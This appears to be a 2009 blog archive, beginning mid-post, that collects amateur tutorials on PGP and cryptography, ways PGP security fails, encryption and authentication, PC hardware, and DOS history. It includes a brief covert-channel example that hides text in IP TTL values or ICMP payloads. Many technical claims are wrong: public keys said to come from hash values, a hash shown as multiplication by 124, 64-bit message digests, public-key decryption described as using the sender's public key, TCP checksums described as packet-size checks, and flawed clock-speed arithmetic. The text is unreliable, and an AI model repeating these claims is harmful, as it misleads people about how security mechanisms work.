Keys are stored in encrypted form. Typically you use two keyrings (files on hard disk) - one for public keys and other for private. Don't lose private key ring, because all information which was encrypted to keys on that ring will never be accessible (if you won't compromise the cipher, of course).

..And About Digital Signatures
==============================

Just like written signatures, digital signatures provide authentication of the information's origin. Usually this feature of cryptography is much more widely used than encryption. The digital signature is 'impossible' to fake. In short - when you are dealing with this type of signature - you can mostly always be sure you are dealing with the right person (in the sense of authentication, of course).
The digital signature works this way:
1) The plaintext gets encrypted with your private key.
2) If the information can be decrypted with the public key of the yours, then that information comes from you.

The digital signatures are the main way to verify the validation of the public key.

The Message Digest
==================

How do you make sure that no-one is able to just copy and paste your signature from your e-mail to his and claim it came from you? Well, you use a message digest.

The message digest is the output of a hash function. This function takes message of any length and produces a fixed-length, 64-bit output (that's right - it's the same as the message digest hash mentioned earlier). The mathematical side of this function ensures that even if the data differs very slightly, you get entirely different output (known as a message digest). The private key and the digest are used to generate the signature, which is then transmitted along with plaintext. The hash function ensures that no one can take your signature and use it as his own because in such a case verification fails.

Digital Certificates
====================

Of course, when you use public key crytposystem you want to be sure you are encrypting to the right person's key. This is the problem of the trust. Let's say someone posts a fake key with a name of the person who you are writing to. When you encrypt the data and send it to the "recipient", the data goes to the wrong person. In a public key environment, it is very important that you are sure you are using the public key of the intended recipient. One way out is to encrypt only to keys that the owner of has handed to you personally (on a floppy disk, for example). But this is very inconvenient - first, sometimes you don't even know the recipient and the second, what would you do if you need to send some data to a person who is not available physically - in a plane or anywhere else wher you can't meet them physically? Send a pigeon with a note?
Digital certificates simplify this task of checking that you have the correct key. A digital certificate is a piece of data that you can use like a normal physical certificate. This information is included with a person's public key to provide help to verifying the validity of the key. Certificates are used to prevent people substituting one person's key for another.

A digital certificate consists of:
1) a public key
2) certificate information (some information about the user: name, ID and so on)
3) one or more digital signatures

The digital signature on a certificate shows that some person approves the certificate information. The digital signature does not attest to the authenticity of the certificate as a whole; it vouches only that the signed identity goes along with the public key. In short - a certificate is a public key with several forms of ID attached, and approval from some other trusted individual(s). You get most of the benefits of digital certification when it is necessary to exchange public keys with someone else and it is impossible to do manually. Manual public key distribution has its advantages, but is useful only to a certain point. Sometimes it is necessary to put everything in one place - central storage, for instance, with exchange of public keys for anyone who need them. Systems that store such data are called Certificate Servers and systems that provide some additional key management features are called Public Key Infrastructures.
Certificate Servers (aka cert. server / key server) are nothing more than databases that allow users to submit and retrieve digital certificates. Such a server can and usually does provide some administrative features. These features enable a company to maintain its security policies and so on.
A Public Key Infrastructure contains the same the certificate storage facilities of a certificate server, but also provides certificate management facilities - the ability to issue, revoke, store, retrieve and trust certificates. PKI introduces the Certification Authority (CA), which is a person who has authorisation to issue certificates for some company's computer users. A CA creates certificates and digitally signs them, using the CA's private key. If you trust the CA, you can almost always trust the holder of their certificate.

Certificate Formats
===================

A digital certificate is a collection of some identifying information imbedded together with a public key and the signatures of people who trust it's authenticity. PGP recognises two different certificate formats:
1) PGP certificates;
2) X.509 certificates.

A PGP certificate consists of:
1) the PGP version number, which identifies the version of PGP program which was used to create the associated key.
2) The certificate holder's public key together with the algorithm of the key, which can be RSA or DH/DSS (recommended).
3) The certificate validity period which indicates when the certificate will expire;
4) The symmetric encryption algorithm for the key. This information indicates the encryption algorithm to which the certificate owner prefers to have information encrypted. These algorithms are CAST (recommended), IDEA or Triple-DES.

Validity and trust
==================

Validity is confidence that something (a public key or certificate, for example) belongs to its real owner. Validity is very important in public key systems where you must know if the certificate is authentic or not.
When you are sure that some certificate belongs to someone, you can sign the copy on your key ring to attest to the fact that you've checked the certificate and that it is an authentic one. If you export the signature to a certificate server others will know that you approved it. To believe someone who has signed approval of any certificate, you need to trust them.
You can check validity by meeting the intended recipient and taking the key from him physically. The other way is to use fingerprints. A PGP fingerprint is a hash of the certificate (similar to a message digest). All fingerprints are unique. It can appear as hexadecimal number or a series of biometric words, which are phonetically distinct. When you have fingerprints and know the voice of the owner, you can just call him and ask him to read his. But sometimes, you don't know the voice - in such cases you need to trust some third party, like a CA.
But don't forget that unless the owner of the key hands it to you personally you must trust some third party to tell you that this key is valid.

Passwords and passphrases
=========================

Almost everyday, when you are using computers you need to enter a secret combination of characters (a password) to access some information. So you should be familiar with the concept. If not, you have been reading the wrong tutorial.
A passphrase is a longer version of a password and is supposed to be more secure. A passphrase helps you to be more secure against dictionary attacks (compromising PGP will be covered in Part II - Compromising PGP). The best passphrases are relatively long and complex, containing non-alphabetic characters. PGP uses a passphrase to encrypt your private key on your disk using a hash of your passphrase as the secret key. You use the passphrase to decrypt and use your private key. A
passphrase should be hard for you to forget and difficult for others to guess. It should be something already firmly embedded in your long-term memory, rather than something you make up from scratch, because without your passphrase your private key is totally useless and nothing can be done about it. At all.

The Basics of Cryptography

2009-02-06T02:35:00.001-08:00

This guide is for educational purposes only I do not take any responsibility about anything
happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.
If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't
change anything without the permission of the author.
<--=--=--=--=--=--=--=--=>
A word from the author:

I hope you like my texts and find them useful.
If you have any problem or some suggestion feel free to e-mail me but please don't send mails like
"I want to hack the US government please help me" or "Tell me how to bind a trojan into a .jpg"
Be sure if I can help you with something I will do it.
<--=--=--=--=--=--=--=--=>

Table of Contents

1.What is this text about?
2.About Encryption and how it works
3.About the Cryptography and PGP
4.Ways of breaking the encryption
-Bad pass phrases
-Not deleted files
-Viruses and trojans
-Fake Version of PGP
=--=--=--=--=--=--=--=--=

1.What is this text about?
-=-=-=-=-=-=-=-=-=-=-=-=-=
In this text I'll explain you everything about encryption,what is it,PGP,
ways that someone can read your encrypted files etc.Every hacker or
paranoid should use encryption and keep the other from reading their
files.The encryption is very important thing and I'll explain you how can
someone break and decrypt your files.

2.About Encryption and how it works
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Encryption is very old.Even Julius Caesar used it when he was
sending messages because he didn't trust to his messengers.You see
encryption is everywhere,when you watch some spy film you see
there's always a computer with encrypted files or some film about hackers
when the feds busted the hacker and they see all of the hacker's files are
encrypted.

When you have simple .txt file that you can read this is called "plain text".
But when you use encryption and encrypt the file it will become unreadable
by the time you don't enter the password.This text is called cipher text.
The process of converting a cipher text into plain text is called decryption.

Here's a little example:

Plain text ==>Encryption==>Ciphertext==>Descryption==>Plaintext

This example shows you the way when you encrypt and decrypt a file.

3.About the Cryptography and PGP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Cryptography is science that use the mathematics to encrypt and decrypt data.This science
let you keep your files and documents safe even on insecure networks like the Internet.
The cryptography can be weak and strong.The best is of course the strong one.Even when you
use all the computers in the world and they're doing billion operations in second you'll just need
BILLIONS of years to decrypt strong encryption.

PGP (Pretty Good Privacy) is maybe the best encryption program to encrypt your files and documents.
It work in this way:

When you encrypt one file with PGP,PGP first compress the file.This saves you disk space and modem
transmition.Then it creates a session key.This session key works with a very secure and fast
confidential encryption algorithm to encrypt the file.Then the session key is encrypted with the
recipient's public key.
PGP ask you for pass phrase not for password.This is more secure against the dictionary attacks
when someone tries to use all the words in a dictionary to get your password.When you use
pass phrase you can enter a whole phrase with upper and lowercase letters with numeric and
punctuation characters.

4.Ways of breaking the encryption
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP has been written for people that want their files encrypted for people that want privacy.
When you send an e-mail it can be read from other people if you use PGP only the person for who
is the message will be able to read it.

Now you know many things about PGP and the encryption but you may like to know can someone
break it and read your private texts and files.In fact if you use all the computers in the world to
decrypt a simple PGP message they'll need 12 million times the age of the universe to break it.
You see this is the BEST the encryption is so strong noone can break it.
The people that program it has done their work now everything depends on you.

-Bad pass phrases
*****************

The algorithm is unbreakable but they're other ways to decrypt the text and read it.
One of the biggest mistakes when someone writes his/her pass phrase is that the pass phrase is
something like : "John" "I love you" and such lame phrases.Other one are the name of some friend
or something like that.This is not good because this is pass phrase not password make it longer
put numbers and other characters in it.The longer your pass phrase is the harder it will be guessed
but put whole sentences even one that doesn't make sense just think in this way:
Someone is brute-forcing thousands of pass phrases from a dictionary therefore my pass phrase
should be someone that is not there in the dictionary something very stupid like:

hEllowOrld33IjustwanTtoteLLtoev3ryon3thatI'maLamErandI'mahacKer666

This is easy to remember because it's funny and there are only a few numbers but you may not use
upper and lowercase characters.I hope you know will put some very good pass phrase and be sure
noone will know it.

Another mistake is that you may write the pass phase on a paper and if someone find it you'll loose
it and he/she will be able to read your encrypted files.

-Not deleted files
******************

Another big security problem is how most of the operating systems delete files.So when you encrypt
the file you delete the plain text and of course leave the encrypted one.
But the system doesn't actually delete the file.It just mark those blocks of the disk deleted and free.
Someone may run a disk recovery program and still see all the files but in plaintext.Even when you're
writing your text file with a word editor it can create some temporary copies of it.When you close it
these files are deleted but as I told you they're still somewhere on your computer.
PGP has tool called PGP Secure Wipe that complete removes all deleted files from your computer
by overwriting them.In this way you'll only have the encrypted files on your computer.

-Viruses and Trojans
********************

Another dangerous security problem are the viruses and the trojans.So when you infect with a
trojan the attacker may run a key logger on your system.

*Note
A key logger is a program that captures all keystrokes pressed by you then saves them on your
hard drive or send them to the attacker
***************************************
So after the attacker run it he/she will be able to see everything you have written on your computer
and of course with your PGP pass phrase.
There are also a viruses designed to do this.Simpy record your pass phrase and send it back to the
attacker.

-Fake Version of PGP
********************

Another security problem is the PGP source that is
available so someone can make a fake copy of it that is recording your pass phase and
sending it back to the attacker.The program will look real and it will work but it may also have
functions you even don't know about.
A way of defending of these security problems is to use a trojan and a virus scanner.You should
also be sure your computer is clean from viruses and trojans when you install PGP and also be sure
you get PGP from Network Associates Inc. not from some other pages.

So now I hope you understand that PGP can't be braked but if you use it wisely and be sure
your pass phrase is good one,you're not infected with viruses or trojans and you're using the
real version of PGP you'll be secure.

ENCRYPTION AND AUTHENTICATION

2009-02-06T02:34:00.000-08:00

CONTENTS
=======================================

1. Introduction.
2. Key Systems.

2.1 Symmetric Key
2.2 Public Key

3. Digital Certificates.
4. Hash Algorithms.
5. Authentication.

5.1 Usernames and Passwords
5.2 Passcards
5.3 Digital Signatures
5.4 Checksum

6. Biometrics.
7. Steganography.
8. Last Words.

____________________________________________________________________________________________

1.0 INTRODUCTION
=======================================

In recent times privacy and security has become increasingly important
especially with newer technologies like wireless networking and the
potential problems they represent. Encryption has always been an
effective way to conceal information and before the digital era it was
mostly used my governments such as the germans and americans during the
second world war and has been seen as far back as the times of the great
Roman Empire. There is alot of information that we would like to keep
private like credit card and financial information and personal letters
and conversations, encryption and the science of cryptography allows us
to do this.

2.0 KEY SYSTEMS
=======================================

There are two different kinds of systems used to handle encryption and
convert data these are called Symmetric and Public key encryption.

2.1 SYMMETRIC KEY
=======================================

Symmetric key encryption involves 2 computers on a network each with a
"key" installed on it. This key allows each of the computers to decode
the encrypted data that was sent to it. For example computer A is sending
an encrypted packet to computer B for this example we will use a very
simple kind of encryption, for every letter in the data we move down
the alphabet 2 places A becomes C and B becomes D, using this information
we can both encrypt and decrypt the information.

Computer Symmetric Key Computer
======== ============= ========
A --->----- Shift 2 places --->---- B

Using the shift 2 places key A can send the message 'Hello' to B, Hello
will be shifted by the key and B will recieve "Jgnnq" this just looks like
gibberish until B looks at its key and it knows to shift the letters 2
places, doing this B can see that it says Hello, of course this is a bit
simplified but you can see how this method can be built upon to form
greater, more sophisticated levels of encryption.

2.2 PUBLIC KEY
=======================================

Public Key encryption relies upon 2 keys, the public key and the private key.
The private key is held by your computer, when you want to send secure
data between a computer and your own you give your public key to that person
then every computer that wants to communicate with you has a copy of your
public key. To decode any messages you send to those computers they must use
a combination of both your public key and their own private key, this method
of encryption is most popularly used with the encryption program pgp, you
can get this software from www.pgp.com.

Most computers use a mixture of symmetric and public key encryption because
of the amount of processing that is required. When starting a secure connection
the first computer uses a symmetric key and sends this to the second computer
using public key encryption. The two computers then use symmetric encryption
for the rest of the transaction. Once the session is completed the key is
discarded and a new key must be created for all following sessions, this means
that even if somehow a person gets your key, once the session has ended it wont
matter and the key will be useless.

3.0 DIGITAL CERTIFICATES
=======================================

Public Key encryption wouldn't be practical to use for applications such as
web servers for online transactions, for this purpose Digital Certificates
were developed. The digital certificate is a small file provided to each
computer by an independent system called a certification body, this tells
each computer that the other one is who it says it is and that it can be
trusted, the certification body then sends the public keys of each computer
to the other and they are free to communicate.

The digital cert method is mostly used in SSL (Secure Sockets Layer). SSL
was developed by netscape and quickly adopted for browser to web server
communication, especially by sites dealing in e-commerce and financial trans-
actions such as amazon.com or dabs.com.

SSL is a part of larger security protocol called TLS (Transport Layer Security)
which has a large backing from microsoft. In your web browser there is 2 tell
tale signs that such precautions are in place, the first is the small pad-lock
that appears in your status bar if it appears to be locked the site is secure,
otherwise there is no security between your connection, another sign is the
address in the bar at the top, if you had a secure transaction in place with
blacksun's site your address bar would read https://www.bsrf.org.uk instead
of the usual http:// beofore the address. You may also notice some Certificate
or digitally signed alerts you recieve when you try to download certain software
or access certain websites, this is just to tell you that the site *should*
essentially be trustworthy altough the average web surfer wont have a clue what
its talking about.

4.0 HASH ALGORITHMS
=======================================

To get a public key we use a hash value, to get this value the computer uses
an input value usually a large one like 12,537, then puts that number trough
the hashing algorithm and we get an ouput, if we had a simple algorithm like
multiply the input number by 124 we would end up with 1,554,588, it would be
very hard to guess the original number was 12,537 unless you knew to divide
the output by 124 to get the original number. Most Hash algorithms are much
more sophisticated than this.

Hash algorithms can be very long and use massive hash values, the level of
encryption is measured by its hash value and this can go up to 128 bit numbers
which would give us a hash value of anything between 2 to the power of 0 and
2 to the power of 128, which in decimal terms is anywhere inbetween 0 and
3,402,823,669,209,384,634,633,746,074,300,000,000,000,000,000,000,000,000,000,000,000,000.
which would be a little more difficult :).

5.0 AUTHENTICATION
=======================================

Another option in computer security which is often used hand in hand with
encryption is authentication systems. There are several different commonly
used authentication systems including the following.

5.1 USERNAMES AND PASSWORDS
=======================================

This method has been used for many years to gaurd the personal information
and privacy of different users on a computer system or network. This is
the most popular method and is in place in one form or another on every
operating system to varying degrees of success. The computer encrypts the
password and compares it with an earlier encrypted version of the users
password, if the two files match then the password is correct. A password
cracker operates by encrypting a series of words and comparing them with
the password file, once it finds a match it alerts the user of the cracking
software with both username and password.

5.2 PASS CARDS
=======================================

There are several types of pass cards mostly used in offices, these range
from standard swipe cards, similiar to credit cards they have a magnetic
strip holding the users information, to smart cards containg a small chip,
this method is used most commonly on the macintosh where you place a small
card into the keyboard on the left, some software such as Quark Express
uses this method to ensure that a licence for the software has been purchased.

5.3 DIGITAL SIGNATURES
=======================================

Digital signatures are a form of public key encryption. The signer of the
document(e-mail, text file etc..) uses his private key and a four part
public key to digitally sign the document, the algorithm used is the
Digital Signature Algorithm (DSA) which is endorsed by the US government.
If any changes occur to the contents of the document after it has been
signed the signature is rendered invalid.

5.4 CHECKSUM
=======================================

Checksum methods arent usually used for security purposes but can be used
as such. TCP/IP uses a checksum technique, it gets the size of the packet
and stores it in a field within the header, on arrival to the remote computer
it checks the size of the packet and then compares it with the value of the
field within the header, if the 2 dont match, the packet is discarded this
is usually because of errors or loss during transport but this and similiar
methods can be used to ensure data is not altered by a person.

6.0 BIOMETRICS
=======================================

Biometrics operate on the fact that every person has a certain unique
set of features about them and these features are then used as a basis
of authentification to that person. Biometric authentication can use
several features of the person including,

Face scan - Identifying a person based on the features of their face.
Retina Scan - Identified upon the patterns of the eyes retina.
Fingerprints - Identifies the person on their unique fingerprint.
Voice Identification - Based upon levels and pitch of voice.
DNS Fingerprinting - Not very common, checks the DNA structure from biological material.

7.0 STEGANOGRAPHY
=======================================

Steganography is the process of storing information within common everyday
material. This method is most commonly used with images such as gif or jpeg
files however the technology has been extended to other areas such as mp3
files or common internet traffic within the headers. There are many programs
available across the internet for hiding information with steganogaphy.
As an example of steganography heres an example of storing some information
within normal web traffic:

within the ip header theres a field called the ttl or Time-To-Live, which
holds a numeric value, by storing the numerical value of an ascii characther
we can send short messages 1 charachter at a time, the maximum value of an
ascii characther is 255 so this value would not seem very uncommon so far as
ttl fields in ordinary traffic. You would have to ensure the remote computer
was on the same network so that the hop count could be predicted, move 1
charachter up for each hop to handle the ttl being decremented. A better
example would be to use icmp, icmp has alot of room left within its body
as it doesnt usually carry a payload, by storing information with the payload
of an icmp packet you could transfer information similiarly to normal traffic
and it is uncommon for this to be checked or logged by systems, this could be
further improved by encrypting the payload and this method is not bound by
prolems such as calculating the hops and has much more room to transmit data,
despite limitations heres an example of transmitting a word in ttl fields >>

Packet-1
192.62.4.1->192.62.4.2, win:512, ttl:72, id:20482
(72 = 'H')

Packet-2
192.62.4.1->192.62.4.2, win:512, ttl:69, id:21436
(69 = 'E')

Packet-3
192.62.4.1->192.62.4.2, win:512, ttl:76, id:22132
(76 = 'L')

Packet-4
192.62.4.1->192.62.4.2, win:512, ttl:76, id:23019
(76 = 'L')

Packet-5
192.62.4.1->192.62.4.2, win:512, ttl:79, id:24149
(79 = 'O')

Packet-6
192.62.4.1->192.62.4.2, win:512, ttl:10, id:25218
(10 = '\r\n'[Carriage return or New Line])

This transfers H-E-L-L-O\r\n, which is of course the
word hello, its terminated by a carriage return to
track the end of each word.

8.0 LAST WORDS
=======================================

By using a mixture of these technologies it is possible to make communiceation
and information more secure from unwelcome eyes and ears. Thanks to these
methods digital transmissions are more secure than other kinds like mail
or even phone calls, especially on cellular phones, altough it pays to
remember that nothing is truely secure, especially in the way that the
encryption algorithms were so quickly cracked and captured using radio
antennas on wireless networks or from programs such as john the cracker.

Well thats the end of this little tutorial and i hope you learnt more about
both encryption and authentication and their processes.

pc hardware

2009-02-06T02:29:00.000-08:00

This isn't so much a tutorial, as it doesn't actually teach you much.. It's more a text on hardware for those of you sick of newbie tutorials, and looking for something interesting and non-dangerous. This is mainly about motherboard stuff, but I stuck something about HDs, mice and Gfx cards at the end. Hey, if people like it and tell me, I might even stretch and do al the other computer bits and bobs. ;)

The BIOS.
This contains instructions which are specific for that particular motherboard. Those programs and instructions will remain in the PC throughout its life; usually they are not altered. However, it is possible to get replacement / upgrade BIOS's. Primarily the ROM code holds start-up instructions. In fact there are several different programs inside the start-up instructions, but for most users, they are all woven together. You can differentiate between:

* POST (Power On Self Test)
* The Setup instructions, which connect with the CMOS instructions
* BIOS instructions, which connect with the various hardware peripherals
* The Boot instructions, which call the operating system (DOS, OS/2, or Windows)

Note: Only very old or different OS's are stored on ROM, such as OS/2. This is actually a much more efficient system.
BIOS's are static sensitive, so take care when handling them. They can also be PWord protected... if you ever get round to doing this, don't forget the password. As you don't use the BIOS PWord often, this is easy to do. Don't. it's bloody hard getting the PWord back.

Processors
Processors work on a fetch-execute cycle. each tick of the clock, in theory, they get a bit of data... and by tick of the clock here, we don't mean a second, we mean the tick of a computer clock. Depending on the speed of your processor, this is anywhere from 233 million ticks per second for a 233, to 800 for an overclocked 600MHz Athlon chip.
So, you can get, on your average computer, 400 - 500 bits of data per second. Well, wrong actually... because not every clock tick is taken up by getting the data. Every _fourth_ is. Well, what about every other 3? you ask.. they are taken up with _finding_ the data, _getting_ it, and putting it back. So, you say, your processor runs at a quarter of the speed that in theory it should be able to do? Well, yes. And there's no way around this, unfortunately. But, we can make the clock speed a little faster, and it is the clock speed that dictates the speed of the processor... (within reason).
Therefore, you can set the clock ticks on your 233 to 266, and it'll run at 166 MHz. Yes. Unfortunately, the more clock ticks there are in relation to what your chip is _supposed_ to run at, the hotter it Gets. Therefore, you need to install heatsyncs/fans. In fact, the AMD Athlon 600MHz overclocked to 800MHz, the fastest PC at the time of writing has a minature fridge that cools the chip, which is its own special metal box. The tower-sized case also has a box the size of a mini-tower underneath for the cooling system. ;)
For this increase in temperature of 200MHz, the chip is cooled to -37 degrees centigrade. that's cold. ;) (Note: AMD chips generally run a lot hotter than Intel ones). ((Not a problem unless u have no heatsync)) - see the micron section, below...

The Clock
Now, this fabled clock looks like, in most cases, a small black box on your motherboard. The clock ticks it emitts are in the form of a wave , but a different wave: one that is sqare, and it looks like a castle ramparts. the speed of this is dictated by the MHx setting you set with the Jumpers on your motherboard. The waves look like so: (except slightly more square)

__ _ ____ _ _ ___
_¦ ¦___¦ ¦__¦ ¦_¦ ¦_¦ ¦__¦ ¦__ and etc.

The wave, which never changes, and is always the same, is broadcast throughout your motherboard, and it synchronises all of the things that go on there. For example, when you press the left button in your game of quake, the processor assigns different bits of your computer to do whatever is neccacery to redraw what's on the screen, and tells it to have it done in 3 ticks' time. The same process occurs on the gfx card itself, where the main processor assigns a polygon to each other chip, or whatever. Infact, if you have an old enough computer, you can see it being redrawn on the screen... try it... run a gfx-intensive game on a 486... If the task isn't done in time, then it all falls apart, and the computer crashes. This is why you don't want to buy a dodgy CPU. :) (Get an AMD Athlon!).
The signals sent run around your motherboard, through all of those copper bits, and into the chips, ISA slots, or whatever, and the task gets accomplished.

This signal is sent around the motherboard in that most wonderful of things we all love, Binary. Now, Binary is what Computers communicate with, and it is a DIGITAL thing. Digital. A Much used term.
COmputers are electronic, and therefore, all the signals in them are tiny pulses of electricity. Now, electricity can be one of two things. On... or off. And this is what makes it digital. If it could be half on as well, it would be analogue... But no. It's digital. However, the representation of it in the form of signals down wires is analogue, as a sound in a modem wire can be any of a hundred million different pitches, can't it. Yes. This digital signal is, then, a series of 0's and 1's. Binary. The counting system that we use (1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11... etc... ) is Denary. It's Base ten... Binary is Base 2 (and Hexadecimal, which is used, amongst other things, is base 16). Therefore it is perfect for being what these signals are coded in. so each charactor on your screen is represented in your computers RAM by a series of Binary digits. Probably 8. if you go into Windows Calculator, and switch to scientific mode (View>Scientific) you can decode this. For example, 1 in Binary is 00000001. 2 is 00000010. The way this can be decoded is thus:

Each digit in binary represents a quantity of a certain number, just as denary does. In denary, there is a column for 1's, a column for 10's, and a column for 100's. And in Binary, there is a column for 1's, 2's, 4's, 8's, etc. Let me show you:

Denary:
100s 10s 1s
1 0 0

Here, there is a one in the hundreds column, and therefore, 100 + 0 + 0 (0 and 0 are the other 2 columns) makes 100. SO 1 0 0 in Denary represents 100. (of course, translating 100 --> 100 doesn't work, as denary is used in both cases). In Binary, this works this:

Binary (8-bit -- 8 digits)
128 64 32 16 8 4 2 1
1 1 1 1 1 0 1 0

SO... 128 + 64 + 32 + 16 + 8 + 2 + 1 = 250.
So the Binary number 11111010 = 250. Simple, eh?

It is possible to do addition, subtraction, multiplication, in fact, EVEYTHING that is possible with denary (1--> 10)... I'm not going to explain it because it is simply too complicated. ;) Use Windows Calculator... the radio buttons at the top left switch between number systems.

Chipset
We all know what assembly language is, do we not? It is the programming language that is most native to a computer. The instructions go directly to the chip (more or less). (Assembly actually lays on top of Machine code, which is the real native: Assembler is a more human-friendly version)... Each chip has their own different version of assembler/machine code, called its _chipset_. Each new type of chip comes with an upgraded chipset: for example, the Intel MMX chip incorporated the...wait for it... MMX chipset! There are also chipsets such as 3D!Now. THe most basic of commands between, say, Intel and AMD are the same: they have to be in order for the two to be compatible, but more advanced things are different. This is why Alpha chips are incompatible with windows: The chipset is completely different.
Intel has hitherto been the leader in supplying chip sets to the Pentium motherboard. Therefore, let us just mention their chip sets, which have astronomical names. The Neptune chip set (82434NX) was introduced in June 1994. It replaced the Mercury set (82434LX). In both chip sets, there were problems with the PCI bus. In January 1995 Intel introduced the first Triton, where everything worked. This chip set supports some new features: it supports EDO RAM, and it offers bus master integrated EIDE control and NSP (Native Signal Processing - one of the many new creations, which was soon forgotten).
The sorts of things that new chipsets are used for are varied... for example, The Intel TX Chipset, for example, supports SDRam and UltraDMA (But the TX-set cannot cache above 64 MB RAM, and that is a problem.), while AMD chips have their own special Graphics chipset, which is better for that task.

Microns
The CPUs have doubled their calculating capacity every 18 months. This is called "Moore's Law" and was predicted in 1965 by Gordon Moore. He was right for more than 30 years. The latest CPUs use internal wiring only 0.25 microns wide (1/400 of a human hair). But if Moore's Law has to be valid into the next century, more transistors have to be squeezed onto silicon layers. And now there is a new hope. IBM has for the first time succeeded in making copper conductors instead of aluminum. Copper is cheaper and faster, but the problem was to isolate it from the silicon. The problem has been solved with a new type of coating, and now chips can be designed with 0.13 micron technology. The technology is expected later to work with just 0.05 micron wiring! Texas Instruments announced on August 27th 1998 that they expect 0.07 micron CMOS processing in the year 2001. At the time of writing, AMD chips run at .27 microns (?) and Intel at .33. This explains why AMD chips are hotter, as there is less wire, and therefore more probability of the electrons that the electricity is comprised of hitting the side of the wires, and creating heat.

Hard Drives
Hard drives work in much the same way as a floppy disk does. They can, however, store a much larger capacity of data, and therefore are much more fragile, and compact . For this reason, they are hermetically sealed. NEVER OPEN ONE IF YOU WANT TO USE IT AGAIN. There is, inside, 3 or 4 goldy-brown circular plates on which the data is stored. These are much the same as the ones inside a floppy disk, except that they are not 'floppy' but hard, or stiff. The data is stored on the platters magnetically, which explains why floppy disks have a "keep magnets away from me" warning on boxes u buy them in.
IBM introduced the first hard disk in 1957, when data usually was stored on tapes. The first 305 RAMAC (Random Access Method of Accounting and Control) consisted of 50 platters, 24 inch diameter, with a total capacity of 5 MB, a huge storage medium for its time. It cost $35,000 annually in leasing fees (IBM would not sell it outright) and was twice the size of a refrigerator.
In the early 80s, HD's became the preferred storage medium as opposed to floppy drives (these were previously used due to increased reliability). IBM's PS/2 (one of which I have - yay) was one of the first PCs to be equipped with a Hard drive. I think.

Mice
Mice are, as we all know, Input devices, and as we also know, they tell where you are on the mousemat by moving a ball in the bottom. Which you can see. But how does it read how the ball is moving? Well, inside the mouse are 2 rollers, at 90 degrees to each other. When you move the mouse, u move the ball, and thus the rollers. THe rollers have some little discs on the end of them with slits in, and either side of the disc are light-readers, so that when you move tha ball, the mouse can tell because light flasles on and off in its light reader. There is also a 3rd non-functional roller to keep the ball rolling smoothly. Note: It is perfectly safe to turn your mouse upside down ,. take the ball out and look inside, as long as you don't prod anything too hard (twiddle the rollers by all means, just don't stick bits of paper in there). It is also a good idea to get a blunt knife or screw driver and clean the crud off the rollers every few weeks... it solidifies into little rings around the rollers, and works to the detriment of the mouse. If it isn't cleaned off, it can also, fallinto the mouse, and reak havok with the insides. :) The same sort of crud builds up in keyboards, but is harder to remove. ;)

GFX Cards
A video card is typically an adapter, a removable expansion card in the PC. Thus, it can be replaced! The video card can also be an integral part of the system board...This is the case in certain brands of PCs and is always the case in lap tops. This is not nice, as it is hard to upgrade to a better card. On a OC with a non-removable gfx or sound card, the normal procedure if you _do_ want to replace it is to disable the built-in graphics card using jumpers or dip switches... consult your motherboard manual. ;) Regardless of whether it is replaceable or integrated, it consists of three components:

* A video chip of some brand (ATI, Matrox, S3, Cirrus Logic, or Tseng, to name some of the better known). The video chip creates the signals, which the screen must receive to form an image.
* Some kind of RAM (EDO, SGRAM, or VRAM, which are all variations of the regular RAM). Memory is necessary, since the video card must be able to remember a complete screen image at any time.
* A RAMDAC - a chip converting digital/analog signals.

NOTE: Never buy an S3. Never. Ever. I've had lots, they're all useless. Remember that.

All ordinary graphics cards can show 3D games. That is really no special trick. The problem is to present them smoothly and fast. If the PC’s video card is made for 2D execution only, the CPU must do the entire workload of geometric transformations etc.! And that task can cause even the fastest CPU to walk with a limp. In recent years there has been an enormous development in 3D graphics cards. Let me briefly describe those here.

There are two types of graphics cards, which can be used for 3D acceleration:

Combination 2D/3D cards. These are ordinary graphics cards, which have been equipped with extra 3D power.
The pure 3D cards, which only work as accelerators. These cards require that there also is an ordinary (2D) graphics card in the PC.
Of course the pure 3D card yields the best acceleration, but there are also good combination cards on the market.

The History of DOS

2009-02-05T23:16:00.000-08:00

1. Contents: Disclaimer
2. Introduction
3. History
4. The Memory Map
5. Timeline and History Chart
6. Future of DOS
7. Postscript
8. Bibliography

Disclaimer:
Although this document is purely informative, the author claims no responsibility for any misguided souls who find a way to twist its contents into anything harmful or overly offensive.

Introduction:
When a computer is turned on an Operating System must be loaded into the computer's memory before the user can begin using it. IBM compatible machines use an operating system called MS-DOS. MS stands for "MicroSoft" (a trade name), while DOS stands for "Disk Operating System", which tells us that it's original purpose was to provide an interface between a computer and its disk drives. Technically, DOS is a high-level interface between an application program and the computer.

DOS has been extended further, allowing programs to handle the likes of simple memory management, disk operations, assorted system tasks (e.g. date/time), user input commands and managing input/output (i/o) devices (i.e. it provides operating instructions for the computer to manage both hardware and software). Versions 3.1 and up also provide basic networking functions.

Beyond this, DOS provides the user with the important facility of file and disk management (often referred to as disk-housekeeping). This part of DOS is particularly crucial to the user as it was specifically designed for him or her to interact with.

With the advent of installable device drivers and TSR (Terminate but Stay Resident) programs in DOS v2.0, the basic DOS functions could be extended to handle virtually any scale of operations required. This was the first instance of multiple programs being run at once in DOS. Some TSR's can however interfere with the running of programs. When a program is loaded into memory it assumes that it has exclusive use of this memory and will not take into account the fact that another program (the TSR) is also using this area. Thus a conflict can arise causing the program to hang (hang means that the screen freezes and the task being executed stops responding forcing the user to either switch off or reboot the computer).

History:
The development of MS-DOS/PC-DOS began in October 1980, when IBM began searching the market for a suitable operating system to go with their soon to be released IBM PC's (commercial Personal Computers). IBM had originally intended to use Digital Research's industry standard operating system - CP/M (Control Program/Monitor or Control Program for Microcomputer - originally written in 1973 by Gary Kildall in his PL/M language). This was never implemented due to uncertain reasons, the most likely being poor diplomatic relations between the two companies. Later, IBM approached a relatively small company called Microsoft, which specialised in language vending. Bill Gates and Paul Allen had written Microsoft BASIC and were selling it on punched tape or disk to early PC hobbyists.

